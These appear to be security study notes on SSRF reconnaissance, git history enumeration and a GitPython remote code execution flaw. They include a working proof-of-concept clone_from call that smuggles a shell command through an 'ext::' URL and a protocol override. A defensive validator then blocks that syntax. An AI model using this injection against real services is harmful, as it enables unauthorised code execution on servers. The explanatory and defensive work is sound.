SSRF

Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location. In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data, such as authorization credentials, and reveal locally open ports.

If there is an SSRF vulnerability, you should by convention check for the following:

  • Locally open ports, e.g., 5000, 8080, 8888, 9090
  • API endpoints, e.g., /api/v1, /api, /swagger-ui
  • Dot files in the server root, e.g., .htaccess, .git

Enum git log

Very often, developers push a repository to the production system using git, so the full development commit history is present on the server too. It is recommended to enumerate the git log and diff version by version, looking for sensitive information.

> git log
> git diff version1 version2

GitPython

GitPython is a Python library used to interact with Git repositories.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. This is only relevant when enabling the ext transport protocol.

With the ext transport enabled, code execution can be achieved as in the example below:

from git import Repo
r = Repo.init('', bare=True)  # bare repo used only as the object on which clone_from is called
# "ext::" is git's remote-helper syntax and hands the address to a shell; the -c option lifts
# git's default protocol.ext.allow=never, and the library does not reject the ext:: URL.
r.clone_from('ext::sh -c touch% /tmp/pwned', 'tmp', multi_options=["-c protocol.ext.allow=always"])
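As an added example (not GitPython's code and not from the advisory), the validation gate an application that clones user-supplied URLs could place in front of Repo.clone_from, so that neither the URL nor a multi_options entry can select the ext transport. The scheme allowlist, the function names and the decision to reject all explicit "<helper>::" syntax are assumptions to adjust per deployment.

```python
import re
from typing import Iterable, Sequence

# Assumed allowlist of URL schemes a clone service is willing to hand to git.
# "ext::" is remote-helper syntax, not a scheme, and hands its address to a
# shell, so the explicit "<helper>::" form is rejected wholesale.
ALLOWED_SCHEMES = {"https", "http", "ssh", "git"}
REMOTE_HELPER_RE = re.compile(r"^[A-Za-z0-9_-]+::")
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)://")
SCP_LIKE_RE = re.compile(r"^(?:[\w.-]+@)?[\w.-]+:(?!//).+$")
PROTOCOL_OVERRIDE_RE = re.compile(r"protocol\.(?:[\w-]+\.)?allow\s*=")

class UnsafeCloneRequest(ValueError):
    """A URL or git option that could select a transport outside policy."""

def classify_clone_url(url: str) -> str:
    """Return the transport git would pick for url, or raise UnsafeCloneRequest.
    Follows git's precedence: "<helper>::" first, then "scheme://", then the
    scp-like "[user@]host:path" form (ssh). Anything else is a local path,
    which a clone service should not accept either."""
    if REMOTE_HELPER_RE.match(url):
        raise UnsafeCloneRequest("explicit remote-helper syntax is not allowed")
    m = SCHEME_RE.match(url)
    if m:
        scheme = m.group(1).lower()
        if scheme not in ALLOWED_SCHEMES:
            raise UnsafeCloneRequest(f"scheme {scheme!r} is not allowed")
        return scheme
    if SCP_LIKE_RE.match(url) and not re.match(r"^[A-Za-z]:[\\/]", url):
        return "ssh"  # a Windows drive letter is a local path, not host:path
    raise UnsafeCloneRequest("local paths and unrecognised URLs are not allowed")

def check_git_options(options: Iterable[str]) -> None:
    """Reject -c protocol.*.allow overrides, which re-enable transports that
    git disables by default (the clone above needs one to reach ext)."""
    for opt in options:
        if PROTOCOL_OVERRIDE_RE.search(opt):
            raise UnsafeCloneRequest(f"refusing protocol override: {opt!r}")

def is_safe_clone_request(url: str, options: Sequence[str] = ()) -> bool:
    """Boolean form of both checks; the gate a clone wrapper would call before
    Repo.clone_from(url, path, multi_options=list(options))."""
    try:
        classify_clone_url(url)
        check_git_options(options)
    except UnsafeCloneRequest:
        return False
    return True
```

The gate only decides whether a request may reach git; pinning GitPython to a fixed version and leaving protocol.ext.allow at its default remain the actual fixes.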